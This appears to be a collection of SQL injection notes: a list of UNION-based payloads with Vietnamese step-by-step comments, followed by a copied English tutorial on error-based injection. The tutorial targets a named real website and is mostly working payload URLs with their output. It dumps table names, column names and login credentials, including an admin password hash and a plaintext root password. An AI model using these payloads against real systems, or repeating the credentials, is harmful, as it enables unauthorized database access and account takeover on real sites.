id=-53 UNION SELECT 1,2,3,4,5, lcase(table_name) ,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--
id=-53 UNION SELECT 1,2,3,4,5, ucase(table_name) ,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--
id=-53 UNION SELECT 1,2,3,4,5, min(table_name) ,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--
id=-53 UNION SELECT 1,2,3,4,5, max(table_name) ,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--
id=-53 UNION SELECT 1,2,3,4,5, count(table_name) ,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--
id=-53 UNION SELECT 1,2,3,4,5, concat(table_name) ,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database() limit 9,1--
id=40 UNION SELECT 1,2,3,4,5,6,7,8-- -
id=null UNION SELECT 1,2,3,4,5,6,7,8-- -
Null UNION SELECT
======================XSS========================
B1
Tìm thấy cột số vdụ=6
B2
1,2,3,4,5, unhex(hex(group_concat(table_name,0x2f))) ,7,8,9,10,11,12,13,14,15 from information_schema.tables--
Thấy được TABLE tt_emori_admin/,tt_emori_en_admin/,tbl_user/
B3
1,2,3,4,5, unhex(hex(group_concat(column_name,0x2f))) ,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name in (0x74626c5f75736572)--
Với 74626c5f75736572 Find hex từ tbl_user
nó sẽ in ra id/,uid/,pwd/
B4
1,2,3,4,5, group_concat(uid,0x2f,pwd) ,7,8,9,10,11,12,13,14,15 from tbl_user--
user và pass đăng nhập như sau :admin/21232f297a57a5a743894a0e4a801fc3
==SQL INJECTION==
Injecting site with 4 Columns
SQL INJECTION WHERE THE VERSION IS LESS THAN 5.Hello,all ! Today i’m going to teach you how to inject a website, that has version less than 5. Special thankx to my dearest Luge Racer Bro.
Lets start.As example,i’m taking this site.
http://www.ultimatehomedesign.com/news-detail.php?id=312
NOTE: Don’t step ahead if you don’t know UNION BASED Sql injection.
Getting Version
Now,lets check the version with error based query.
+or+1+group+by+concat_ws(0x7e,version (),floor(rand(0)*2))+having+min(0)+or+1–
Version : Duplicate entry ’4.1.22-standard~1′ for key 1
Getting Tables
This site don’t have information_schema. The version is less than 5. We have to guess the table names.
This should be our syntax to guess the tables.
or+1+group+by+concat_ws(0x7e,(select+1+from+Guess_table+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–
Now he we have to guess table name with this syntax. Some tables that usually contains login data :
adminamdinstatortbl_admintbl_adminstatorloginmemberuseruserstable_userssettings
Now i’m trying to guess table name with the syntax.
http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+admin+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–
I tried to guess admin table. There is no table in the database namedadmin.
So error came up :
Table ‘uhd.admin’ doesn’t exist
Lets try to guess another table.
http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+adminstator+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–
Again error came up. There is no table in the database named adminstator
So error came up :
Table ‘uhd.adminstator’ doesn’t exist
Lets try with another table :
http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–
So users table exists.
No error came up :
Duplicate entry ’1~1′ for key 1
Getting ColumnsNow,we have to guess column name. So syntax to get columns should be like this :
+or+1+group+by+concat_ws(0x7e,(select+column_name+from+table_name+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–
Username is the most common table. Lets try with it.
http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+username+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–
Error came up. The column doesn’t exist 
Unknown column ‘username’ in ‘field list’
Lets try to guess another column user_name.
http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_name+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–
Now the site loads good. That means user_name exists.
Now try to guess the password column. Lets try with user_pass.
http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_pass+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–
Extracting data from columnsTo get data from columns,our syntax should be this :
or+1+group+by+concat_ws(0x7e,(select+concat(column_name,0x7e,column_name)+from+table_name+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–
Some times, this query don’t works,as this query don’t works on this site. We have to use substring.
Getting Username:
http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(user_name,1,25))+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+users+group+by+x)a)
With this subtrinquery function we can combine a complex question. This query attempts to retrieve the name database of a database table. One character at a time. The substing function will return the first character of query’s result
The username cames up in the query :
Duplicate entry ‘root~1′ for key 1
Getting Password:
http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(user_pass,1,25))+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+users+group+by+x)a)
Password came up :
Duplicate entry ‘trump123~1′ for key 1